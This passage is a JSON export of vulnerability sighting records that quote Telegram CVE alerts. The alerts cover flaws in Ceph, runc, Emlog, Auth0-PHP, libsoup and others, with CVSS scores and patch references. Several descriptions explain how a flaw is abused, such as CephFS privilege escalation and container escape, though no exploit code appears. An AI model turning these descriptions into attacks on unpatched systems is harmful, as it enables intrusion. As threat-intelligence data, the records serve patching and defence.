"eef460dd-6df6-4fd0-856d-0b18160effab", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-JCJW-58RV-C452", "type": "published-proof-of-concept", "source": "Telegram/dFYuTuT6dl_yI0G9HJyYD_4PvIziWC5eOoZdg93OWAfIZB0", "content": "", "creation_timestamp": "2026-04-24T03:15:39.000000Z"}, {"uuid": "85e56702-f331-46b8-8b1c-4e34422c919f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-89HM-QQ33-2FJM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/19652", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-52555\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:A/AC:H/PR:L/UI:N/S:C/C:H/I:L/A:N)\n\ud83d\udd39 Description: Ceph is a distributed object, block, and file storage platform. In versions 17.2.7, 18.2.1 through 18.2.4, and 19.0.0 through 19.2.2, an unprivileged user can escalate to root privileges in a ceph-fuse mounted CephFS by chmod 777 a directory owned by root to gain access. The result of this is that a user could read, write and execute to any directory owned by root as long as they chmod 777 it. This impacts confidentiality, integrity, and availability. It is patched in versions 17.2.8, 18.2.5, and 19.2.3.\n\ud83d\udccf Published: 2025-06-26T20:21:05.594Z\n\ud83d\udccf Modified: 2025-06-26T20:40:18.751Z\n\ud83d\udd17 References:\n1. https://github.com/ceph/ceph/security/advisories/GHSA-89hm-qq33-2fjm\n2. https://github.com/ceph/ceph/pull/60314", "creation_timestamp": "2025-06-26T20:51:25.000000Z"}, {"uuid": "1eaeab3b-6816-4458-ab6a-966c1f819add", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-F6RX-HF55-4255", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16358", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47778\n\ud83d\udd25 CVSS Score: 6.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:U)\n\ud83d\udd39 Description: Sulu is an open-source PHP content management system based on the Symfony framework. Starting in versions 2.5.21, 2.6.5, and 3.0.0-alpha1, an admin user can upload SVG which may load external data via XML DOM library. This can be used for insecure XML External Entity References. The problem has been patched in versions 2.6.9, 2.5.25, and 3.0.0-alpha3. As a workaround, one may patch the effect file `src/Sulu/Bundle/MediaBundle/FileInspector/SvgFileInspector.php` manually.\n\ud83d\udccf Published: 2025-05-14T15:29:08.187Z\n\ud83d\udccf Modified: 2025-05-14T18:13:14.564Z\n\ud83d\udd17 References:\n1. https://github.com/sulu/sulu/security/advisories/GHSA-f6rx-hf55-4255\n2. https://github.com/sulu/sulu/commit/02f52fca04eb9495b9b4a0c5cc64cf23bc27f544\n3. https://github.com/sulu/sulu/blob/2.6/src/Sulu/Bundle/MediaBundle/FileInspector/SvgFileInspector.php", "creation_timestamp": "2025-05-14T18:31:54.000000Z"}, {"uuid": "bad86e87-7527-4cec-ac5f-671c82dbc701", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9XHX-P3C5-P4V6", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16533", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-48051\n\ud83d\udd25 CVSS Score: 4.7 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:C/C:L/I:L/A:N)\n\ud83d\udd39 Description: powertip.ts in Lila (for Lichess) before ab0beaf allows XSS in some applications because of an innerHTML usage pattern in which text is extracted from a DOM node and interpreted as HTML.\n\ud83d\udccf Published: 2025-05-15T00:00:00.000Z\n\ud83d\udccf Modified: 2025-05-15T16:06:38.044Z\n\ud83d\udd17 References:\n1. https://github.com/lichess-org/lila/security/advisories/GHSA-9xhx-p3c5-p4v6\n2. https://github.com/lichess-org/lila/commit/ab0beaf0ad671761705d9274663c5dc450608527\n3. https://github.com/lichess-org/lila/blob/7b82f35d15f9113ac8a0a9271d34bef4f6119e9f/ui/site/src/powertip.ts#L60", "creation_timestamp": "2025-05-15T16:35:28.000000Z"}, {"uuid": "b594faa5-ec0d-4c21-9a7a-47987f6be085", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XJ9W-5R6Q-X6V4", "type": "seen", "source": "Telegram/OgOvWOsYKDsUPw2Tk2S9qGbonIgzDZlRsoTRSBtlTZ01pNI", "content": "", "creation_timestamp": "2026-04-23T23:27:23.000000Z"}, {"uuid": "fdf7d9aa-1d6f-4bdf-8229-e5cdf70f25d9", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-3CW3-5VXW-G2H3", "type": "seen", "source": "Telegram/OgOvWOsYKDsUPw2Tk2S9qGbonIgzDZlRsoTRSBtlTZ01pNI", "content": "", "creation_timestamp": "2026-04-23T23:27:23.000000Z"}, {"uuid": "464304b3-abe2-4584-b3e0-504c14971b15", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-CXRH-J4JR-QWG3", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16542", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47279\n\ud83d\udd25 CVSS Score: 3.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L)\n\ud83d\udd39 Description: Undici is an HTTP/1.1 client for Node.js. Prior to versions 5.29.0, 6.21.2, and 7.5.0, applications that use undici to implement a webhook-like system are vulnerable. If the attacker set up a server with an invalid certificate, and they can force the application to call the webhook repeatedly, then they can cause a memory leak. This has been patched in versions 5.29.0, 6.21.2, and 7.5.0. As a workaound, avoid calling a webhook repeatedly if the webhook fails.\n\ud83d\udccf Published: 2025-05-15T17:16:02.738Z\n\ud83d\udccf Modified: 2025-05-15T17:16:02.738Z\n\ud83d\udd17 References:\n1. https://github.com/nodejs/undici/security/advisories/GHSA-cxrh-j4jr-qwg3\n2. https://github.com/nodejs/undici/issues/3895\n3. https://github.com/nodejs/undici/pull/4088", "creation_timestamp": "2025-05-15T17:34:33.000000Z"}, {"uuid": "3243aacc-6451-4843-919f-f29a986b01ee", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-XR7R-F8XQ-VFVV", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16539", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-21626\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H)\n\ud83d\udd39 Description: runc is a CLI tool for spawning and running containers on Linux according to the OCI specification. In runc 1.1.11 and earlier, due to an internal file descriptor leak, an attacker could cause a newly-spawned container process (from runc exec) to have a working directory in the host filesystem namespace, allowing for a container escape by giving access to the host filesystem (\"attack 2\"). The same attack could be used by a malicious image to allow a container process to gain access to the host filesystem through runc run (\"attack 1\"). Variants of attacks 1 and 2 could be also be used to overwrite semi-arbitrary host binaries, allowing for complete container escapes (\"attack 3a\" and \"attack 3b\"). runc 1.1.12 includes patches for this issue.\n\ud83d\udccf Published: 2024-01-31T21:31:14.391Z\n\ud83d\udccf Modified: 2025-05-15T16:02:34.619Z\n\ud83d\udd17 References:\n1. https://github.com/opencontainers/runc/security/advisories/GHSA-xr7r-f8xq-vfvv\n2. https://github.com/opencontainers/runc/commit/02120488a4c0fc487d1ed2867e901eeed7ce8ecf\n3. https://github.com/opencontainers/runc/releases/tag/v1.1.12\n4. http://www.openwall.com/lists/oss-security/2024/02/01/1\n5. http://www.openwall.com/lists/oss-security/2024/02/02/3\n6. http://packetstormsecurity.com/files/176993/runc-1.1.11-File-Descriptor-Leak-Privilege-Escalation.html\n7. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SYMO3BANINS6RGFQFKPRG4FIOJ7GWYTL/\n8. https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/2NLXNE23Q5ESQUAI22Z7A63JX2WMPJ2J/\n9. https://lists.debian.org/debian-lts-announce/2024/02/msg00005.html", "creation_timestamp": "2025-05-15T16:35:37.000000Z"}, {"uuid": "2eb0e3ae-7634-4b68-b183-e674e39e818c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-MHR7-2XMV-4C4Q", "type": "seen", "source": "Telegram/OgOvWOsYKDsUPw2Tk2S9qGbonIgzDZlRsoTRSBtlTZ01pNI", "content": "", "creation_timestamp": "2026-04-23T23:27:23.000000Z"}, {"uuid": "269396ad-27be-48f7-9807-b0a7b15b43f0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-QHR6-MGQR-MCHM", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16541", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47285\n\ud83d\udd25 CVSS Score: 2.9 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:P)\n\ud83d\udd39 Description: Vyper is the Pythonic Programming Language for the Ethereum Virtual Machine. In versions up to and including 0.4.2rc1, `concat()` may skip evaluation of side effects when the length of an argument is zero. This is due to a fastpath in the implementation which skips evaluation of argument expressions when their length is zero. In practice, it would be very unusual in user code to construct zero-length bytestrings using an expression with side-effects, since zero-length bytestrings are typically constructed with the empty literal `b\"\"`; the only way to construct an empty bytestring which has side effects would be with the ternary operator introduced in v0.3.8, e.g. `b\"\" if self.do_some_side_effect() else b\"\"`. The fix is available in pull request 4644 and expected to be part of the 0.4.2 release. As a workaround, don't have side effects in expressions which construct zero-length bytestrings.\n\ud83d\udccf Published: 2025-05-15T17:24:03.442Z\n\ud83d\udccf Modified: 2025-05-15T17:24:03.442Z\n\ud83d\udd17 References:\n1. https://github.com/vyperlang/vyper/security/advisories/GHSA-qhr6-mgqr-mchm\n2. https://github.com/vyperlang/vyper/pull/4644\n3. https://github.com/vyperlang/vyper/blob/68b68c4b30c5ef2f312b4674676170b8a6eaa316/vyper/builtins/functions.py#L560-L562", "creation_timestamp": "2025-05-15T17:34:32.000000Z"}, {"uuid": "0b721584-6fd4-4886-b485-d21a5245a236", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-939M-47F7-M559", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16545", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47785\n\ud83d\udd25 CVSS Score: 8.3 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L)\n\ud83d\udd39 Description: Emlog is an open source website building system. In versions up to and including 2.5.9, SQL injection occurs because the $origContent parameter in admin/article_save.php is not strictly filtered. Since admin/article_save.php can be accessed by ordinary registered users, this will cause SQL injection to occur when the registered site is enabled, resulting in the injection of the admin account and password, which is then exploited by the backend remote code execution. As of time of publication, it is unknown whether a fix exists.\n\ud83d\udccf Published: 2025-05-15T19:29:23.499Z\n\ud83d\udccf Modified: 2025-05-15T19:29:23.499Z\n\ud83d\udd17 References:\n1. https://github.com/emlog/emlog/security/advisories/GHSA-939m-47f7-m559", "creation_timestamp": "2025-05-15T19:33:05.000000Z"}, {"uuid": "a28d20af-951a-4f38-9710-f78e951c138f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-8FC8-4G25-C8M7", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16543", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-43853\n\ud83d\udd25 CVSS Score: 7 (cvssV4_0, Vector: CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N)\n\ud83d\udd39 Description: The WebAssembly Micro Runtime's (WAMR) iwasm package is the executable binary built with WAMR VMcore which supports WebAssembly System Interface (WASI) and command line interface. Anyone running WAMR up to and including version 2.2.0 or WAMR built with libc-uvwasi on Windows is affected by a symlink following vulnerability. On WAMR running in Windows, creating a symlink pointing outside of the preopened directory and subsequently opening it with create flag will create a file on host outside of the sandbox. If the symlink points to an existing host file, it's also possible to open it and read its content. Version 2.3.0 fixes the issue.\n\ud83d\udccf Published: 2025-05-15T17:13:11.825Z\n\ud83d\udccf Modified: 2025-05-15T17:13:11.825Z\n\ud83d\udd17 References:\n1. https://github.com/bytecodealliance/wasm-micro-runtime/security/advisories/GHSA-8fc8-4g25-c8m7\n2. https://github.com/bytecodealliance/wasm-micro-runtime/commit/28702edaf739cdeee54e81efe5868bf00724c33c", "creation_timestamp": "2025-05-15T17:34:34.000000Z"}, {"uuid": "04bcceb3-07b3-4138-90ef-5059d4c0a99c", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-V3QC-WRWX-J3PW", "type": "seen", "source": "Telegram/OgOvWOsYKDsUPw2Tk2S9qGbonIgzDZlRsoTRSBtlTZ01pNI", "content": "", "creation_timestamp": "2026-04-23T23:27:23.000000Z"}, {"uuid": "8d818b27-dc20-43a9-9dfb-b93349882aa7", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-GJ32-5MGW-2W27", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16553", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47929\n\ud83d\udd25 CVSS Score: 2.1 (cvssV4_0, Vector: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:N/VA:N/SC:L/SI:L/SA:N/E:P)\n\ud83d\udd39 Description: DumbDrop, a file upload application that provides an interface for dragging and dropping files, has a DOM cross-site scripting vulnerability in the upload functionality prior to commit db27b25372eb9071e63583d8faed2111a2b79f1b. A user could be tricked into uploading a file with a malicious payload. Commit db27b25372eb9071e63583d8faed2111a2b79f1b fixes the vulnerability.\n\ud83d\udccf Published: 2025-05-15T20:11:55.892Z\n\ud83d\udccf Modified: 2025-05-15T20:11:55.892Z\n\ud83d\udd17 References:\n1. https://github.com/DumbWareio/DumbDrop/security/advisories/GHSA-gj32-5mgw-2w27\n2. https://github.com/DumbWareio/DumbDrop/commit/db27b25372eb9071e63583d8faed2111a2b79f1b", "creation_timestamp": "2025-05-15T20:33:32.000000Z"}, {"uuid": "f584ef18-7397-4409-a4c1-0bccbb7d7d06", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-G86V-F9QV-RH6M", "type": "seen", "source": "Telegram/u2qRHjnv5kQDuTkkxczYUuDfihUUcY0XYmdq7J3tY866RjI", "content": "", "creation_timestamp": "2026-04-23T23:27:29.000000Z"}, {"uuid": "20a36a42-a1e4-43e3-955f-3b4064a9ddb0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-7CX3-6M66-7C5M", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16573", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47287\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: Tornado is a Python web framework and asynchronous networking library. When Tornado's ``multipart/form-data`` parser encounters certain errors, it logs a warning but continues trying to parse the remainder of the data. This allows remote attackers to generate an extremely high volume of logs, constituting a DoS attack. This DoS is compounded by the fact that the logging subsystem is synchronous. All versions of Tornado prior to 6.5.0 are affected. The vulnerable parser is enabled by default. Upgrade to Tornado version 6.50 to receive a patch. As a workaround, risk can be mitigated by blocking `Content-Type: multipart/form-data` in a proxy.\n\ud83d\udccf Published: 2025-05-15T21:17:55.188Z\n\ud83d\udccf Modified: 2025-05-15T21:17:55.188Z\n\ud83d\udd17 References:\n1. https://github.com/tornadoweb/tornado/security/advisories/GHSA-7cx3-6m66-7c5m\n2. https://github.com/tornadoweb/tornado/commit/b39b892bf78fe8fea01dd45199aa88307e7162f3", "creation_timestamp": "2025-05-15T21:33:28.000000Z"}, {"uuid": "c106bdd5-bff1-44da-9926-fba9f8637877", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-9WG9-93H9-J8CH", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/16574", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-47275\n\ud83d\udd25 CVSS Score: 9.1 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N)\n\ud83d\udd39 Description: Auth0-PHP provides the PHP SDK for Auth0 Authentication and Management APIs. Starting in version 8.0.0-BETA1 and prior to version 8.14.0, session cookies of applications using the Auth0-PHP SDK configured with CookieStore have authentication tags that can be brute forced, which may result in unauthorized access. Certain pre-conditions are required to be vulnerable to this issue: Applications using the Auth0-PHP SDK, or the Auth0/symfony, Auth0/laravel-auth0, and Auth0/wordpress SDKs that rely on the Auth0-PHP SDK; and session storage configured with CookieStore. Upgrade Auth0/Auth0-PHP to v8.14.0 to receive a patch. As an additional precautionary measure, rotating cookie encryption keys is recommended. Note that once updated, any previous session cookies will be rejected.\n\ud83d\udccf Published: 2025-05-15T21:13:01.150Z\n\ud83d\udccf Modified: 2025-05-15T21:14:59.460Z\n\ud83d\udd17 References:\n1. https://github.com/auth0/auth0-PHP/security/advisories/GHSA-g98g-r7gf-2r25\n2. https://github.com/auth0/laravel-auth0/security/advisories/GHSA-9fwj-9mjf-rhj3\n3. https://github.com/auth0/symfony/security/advisories/GHSA-9wg9-93h9-j8ch\n4. https://github.com/auth0/wordpress/security/advisories/GHSA-2f4r-34m4-3w8q\n5. https://github.com/auth0/auth0-PHP/commit/52a79480fdb246f59dbc089b81a784ae049bd389\n6. https://github.com/auth0/auth0-PHP/releases/tag/8.14.0", "creation_timestamp": "2025-05-15T21:33:29.000000Z"}, {"uuid": "d9ff24cf-26af-44bf-9d83-38e994247a2f", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4440", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15835", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32050\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in libsoup. The libsoup append_param_quoted() function may contain an overflow bug resulting in a buffer under-read.\n\ud83d\udccf Published: 2025-04-03T13:36:29.141Z\n\ud83d\udccf Modified: 2025-05-09T20:16:05.822Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:4440\n2. https://access.redhat.com/errata/RHSA-2025:4508\n3. https://access.redhat.com/errata/RHSA-2025:4560\n4. https://access.redhat.com/errata/RHSA-2025:4568\n5. https://access.redhat.com/security/cve/CVE-2025-32050\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2357067", "creation_timestamp": "2025-05-09T20:26:07.000000Z"}, {"uuid": "0017efc9-04ca-481b-8ee9-9a5ca5fd75e0", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4508", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15835", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32050\n\ud83d\udd25 CVSS Score: 5.9 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A flaw was found in libsoup. The libsoup append_param_quoted() function may contain an overflow bug resulting in a buffer under-read.\n\ud83d\udccf Published: 2025-04-03T13:36:29.141Z\n\ud83d\udccf Modified: 2025-05-09T20:16:05.822Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:4440\n2. https://access.redhat.com/errata/RHSA-2025:4508\n3. https://access.redhat.com/errata/RHSA-2025:4560\n4. https://access.redhat.com/errata/RHSA-2025:4568\n5. https://access.redhat.com/security/cve/CVE-2025-32050\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2357067", "creation_timestamp": "2025-05-09T20:26:07.000000Z"}, {"uuid": "ba66374e-a826-4e09-b0eb-d6ff7560058a", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4440", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15833", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32052\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L)\n\ud83d\udd39 Description: A flaw was found in libsoup. A vulnerability in the sniff_unknown() function may lead to heap buffer over-read.\n\ud83d\udccf Published: 2025-04-03T13:37:23.109Z\n\ud83d\udccf Modified: 2025-05-09T20:21:41.858Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:4440\n2. https://access.redhat.com/errata/RHSA-2025:4508\n3. https://access.redhat.com/errata/RHSA-2025:4560\n4. https://access.redhat.com/errata/RHSA-2025:4568\n5. https://access.redhat.com/security/cve/CVE-2025-32052\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2357069", "creation_timestamp": "2025-05-09T20:26:05.000000Z"}, {"uuid": "0d152ad9-5462-4990-bac3-7ad27b3f7f41", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2025:4508", "type": "seen", "source": "https://t.me/DarkWebInformer_CVEAlerts/15833", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-32052\n\ud83d\udd25 CVSS Score: 6.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:L)\n\ud83d\udd39 Description: A flaw was found in libsoup. A vulnerability in the sniff_unknown() function may lead to heap buffer over-read.\n\ud83d\udccf Published: 2025-04-03T13:37:23.109Z\n\ud83d\udccf Modified: 2025-05-09T20:21:41.858Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2025:4440\n2. https://access.redhat.com/errata/RHSA-2025:4508\n3. https://access.redhat.com/errata/RHSA-2025:4560\n4. https://access.redhat.com/errata/RHSA-2025:4568\n5. https://access.redhat.com/security/cve/CVE-2025-32052\n6. https://bugzilla.redhat.com/show_bug.cgi?id=2357069", "creation_timestamp": "2025-05-09T20:26:05.000000Z"}, {"uuid": "f2c33897-20c0-4299-8dcc-6876bc2df2b4", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "GHSA-46R4-F8GJ-XG56", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/15837", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2025-27773\n\ud83d\udd25 CVSS Score: 8.6 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:N/I:H/A:N)\n\ud83d\udd39 Description: The SimpleSAMLphp SAML2 library is a PHP library for SAML2 related functionality. Prior to versions 4.17.0 and 5.0.0-alpha.20, there is a signature confusion attack in the HTTPRedirect binding. An attacker with any signed SAMLResponse via the HTTP-Redirect binding can cause the application to accept an unsigned message. Versions 4.17.0 and 5.0.0-alpha.20 contain a fix for the issue.\n\ud83d\udccf Published: 2025-03-11T19:04:52.135Z\n\ud83d\udccf Modified: 2025-05-09T20:03:38.107Z\n\ud83d\udd17 References:\n1. https://github.com/simplesamlphp/saml2/security/advisories/GHSA-46r4-f8gj-xg56\n2. https://github.com/simplesamlphp/saml2/commit/7867d6099dc7f31bed1ea10e5bea159c5623d2a0\n3. https://github.com/simplesamlphp/saml2/blob/9545abd0d9d48388f2fa00469c5c1e0294f0303e/src/SAML2/HTTPRedirect.php#L104-L113\n4. https://github.com/simplesamlphp/saml2/blob/9545abd0d9d48388f2fa00469c5c1e0294f0303e/src/SAML2/HTTPRedirect.php#L178-L217", "creation_timestamp": "2025-05-09T20:26:09.000000Z"}, {"uuid": "9078ab8b-06b3-4b4f-bfba-e50f131cddc3", "vulnerability_lookup_origin": "1a89b78e-f703-45f3-bb86-59eb712668bd", "author": "2a075640-a300-48a4-bb44-bc6130783b9b", "vulnerability": "RHSA-2024:4591", "type": "published-proof-of-concept", "source": "https://t.me/DarkWebInformer_CVEAlerts/16071", "content": "\ud83d\udd17 DarkWebInformer.com - Cyber Threat Intelligence\n\ud83d\udccc CVE ID: CVE-2024-1394\n\ud83d\udd25 CVSS Score: 7.5 (cvssV3_1, Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H)\n\ud83d\udd39 Description: A memory leak flaw was found in Golang in the RSA encrypting/decrypting code, which might lead to a resource exhaustion vulnerability using attacker-controlled inputs\u200b. The memory leak happens in github.com/golang-fips/openssl/openssl/rsa.go#L113. The objects leaked are pkey\u200b and ctx\u200b. That function uses named return parameters to free pkey\u200b and ctx\u200b if there is an error initializing the context or setting the different properties. All return statements related to error cases follow the \"return nil, nil, fail(...)\" pattern, meaning that pkey\u200b and ctx\u200b will be nil inside the deferred function that should free them.\n\ud83d\udccf Published: 2024-03-21T12:16:38.790Z\n\ud83d\udccf Modified: 2025-05-12T23:02:02.486Z\n\ud83d\udd17 References:\n1. https://access.redhat.com/errata/RHSA-2024:1462\n2. https://access.redhat.com/errata/RHSA-2024:1468\n3. https://access.redhat.com/errata/RHSA-2024:1472\n4. https://access.redhat.com/errata/RHSA-2024:1501\n5. https://access.redhat.com/errata/RHSA-2024:1502\n6. https://access.redhat.com/errata/RHSA-2024:1561\n7. https://access.redhat.com/errata/RHSA-2024:1563\n8. https://access.redhat.com/errata/RHSA-2024:1566\n9. https://access.redhat.com/errata/RHSA-2024:1567\n10. https://access.redhat.com/errata/RHSA-2024:1574\n11. https://access.redhat.com/errata/RHSA-2024:1640\n12. https://access.redhat.com/errata/RHSA-2024:1644\n13. https://access.redhat.com/errata/RHSA-2024:1646\n14. https://access.redhat.com/errata/RHSA-2024:1763\n15. https://access.redhat.com/errata/RHSA-2024:1897\n16. https://access.redhat.com/errata/RHSA-2024:2562\n17. https://access.redhat.com/errata/RHSA-2024:2568\n18. https://access.redhat.com/errata/RHSA-2024:2569\n19. https://access.redhat.com/errata/RHSA-2024:2729\n20. https://access.redhat.com/errata/RHSA-2024:2730\n21. https://access.redhat.com/errata/RHSA-2024:2767\n22. https://access.redhat.com/errata/RHSA-2024:3265\n23. https://access.redhat.com/errata/RHSA-2024:3352\n24. https://access.redhat.com/errata/RHSA-2024:4146\n25. https://access.redhat.com/errata/RHSA-2024:4371\n26. https://access.redhat.com/errata/RHSA-2024:4378\n27. https://access.redhat.com/errata/RHSA-2024:4379\n28. https://access.redhat.com/errata/RHSA-2024:4502\n29. 